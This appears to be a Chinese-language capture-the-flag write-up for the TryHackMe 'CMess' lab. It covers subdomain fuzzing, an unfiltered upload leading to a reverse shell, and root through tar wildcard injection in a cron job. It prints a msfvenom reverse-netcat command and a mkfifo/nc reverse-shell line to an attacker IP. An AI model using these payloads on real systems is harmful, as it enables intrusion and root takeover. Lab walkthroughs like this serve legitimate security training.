TryHackMe-CMess

在线靶场链接

信息收集

nmap扫描

首先把ip cmess.thm的域名添加上/etc/hosts,先爆破子域名(因为看到了提示…

1
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm/" -H "Host: FUZZ.cmess.thm" --hl 107


wfuzz 爆破子域后,将被爆破出来的子域名添加上/etc/hosts上

脆弱利用

通过找到的帐号密码,登录上来后搜索一番,找到了上传路径(没有任何过滤的。上传一句话或者是php-reverse-shell,连接上去后。发现andre用户是没有权限进去的,搜索属于该用户的文件也没找到有价值的东西,最后在/opt下面发现了一个奇怪的文件。。找到andre的密码,可以直接ssh连接上去了。

1
user-flag:***{********************************}

提权

查看sudo -l无果,但是在/etc/crontab下看到了这个定时任务。有通配符的tar~

tar wildcar注入走起~Linux提权方式

第三个的payload,替换成自己用msfvenom生成的payload

1
msfvenom -p cmd/unix/reverse_netcat LHOST=your_ip LPORT=8888 R
payload
1
2
3
4
cd /var/www/html/
echo "">"--checkpoint-action=exec=sh shell.sh"
echo "">"--checkpoint=1"
echo "mkfifo /tmp/cflw;nc your_ip 8888 0</tmp/clfw |/bin/sh >/tmp/cflw 2>&1">shell.sh

倒杯茶,等待两分钟。你就能拿到root权限了

拿到root权限

1
root-flag:***{********************************}

总结

学习了一下wfuzz的基本使用,顺带复习了tar通配符提权。